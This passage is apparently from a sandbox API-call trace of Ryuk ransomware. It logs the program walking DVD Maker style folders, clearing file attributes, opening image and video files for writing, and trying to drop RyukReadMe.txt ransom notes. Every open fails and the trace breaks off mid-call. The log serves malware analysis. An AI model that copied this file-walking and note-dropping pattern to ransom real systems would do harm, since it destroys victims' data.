(lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.737] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.738] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.738] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.738] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.738] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.739] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.739] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.739] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.739] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.739] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.740] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.740] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.740] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.740] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.740] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.741] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.741] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", dwFileAttributes=0x80) returned 0 [0133.741] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.742] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.742] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.742] SetLastError (dwErrCode=0x0) [0133.742] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.745] GetLastError () returned 0x5 [0133.745] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.745] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.745] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.745] SetLastError (dwErrCode=0x0) [0133.745] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.745] GetLastError () returned 0x5 [0133.745] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.746] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.747] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.747] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.747] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.747] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", dwFileAttributes=0x80) returned 0 [0133.748] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.748] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.748] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.748] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.748] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.748] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", dwFileAttributes=0x80) returned 0 [0133.748] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.748] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.748] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.749] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.749] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", dwFileAttributes=0x80) returned 0 [0133.749] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.749] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.749] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.749] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.749] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", dwFileAttributes=0x80) returned 0 [0133.749] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.750] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.750] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.750] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png", dwFileAttributes=0x80) returned 0 [0133.751] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.751] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.751] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.751] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0133.751] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.751] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.751] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.752] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png", dwFileAttributes=0x80) returned 0 [0133.752] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.752] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.752] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.752] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.752] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png", dwFileAttributes=0x80) returned 0 [0133.752] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.752] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.752] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.753] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.753] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.753] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", dwFileAttributes=0x80) returned 0 [0133.753] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.754] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.754] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.754] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.754] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", dwFileAttributes=0x80) returned 0 [0133.754] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.754] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.754] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.754] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.754] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", dwFileAttributes=0x80) returned 0 [0133.755] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.755] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.755] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.755] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv", dwFileAttributes=0x80) returned 0 [0133.755] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.755] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.755] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.756] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png", dwFileAttributes=0x80) returned 0 [0133.756] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.756] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.756] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.756] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.757] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv", dwFileAttributes=0x80) returned 0 [0133.757] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.757] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.757] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.757] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.757] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.757] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.757] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.758] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.758] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png", dwFileAttributes=0x80) returned 0 [0133.758] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.758] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.758] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.758] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png", dwFileAttributes=0x80) returned 0 [0133.759] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.759] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.759] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.759] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.760] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.760] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.760] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png", dwFileAttributes=0x80) returned 0 [0133.760] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.760] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.760] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.761] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png", dwFileAttributes=0x80) returned 0 [0133.761] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.761] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.761] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.761] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png", dwFileAttributes=0x80) returned 0 [0133.762] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 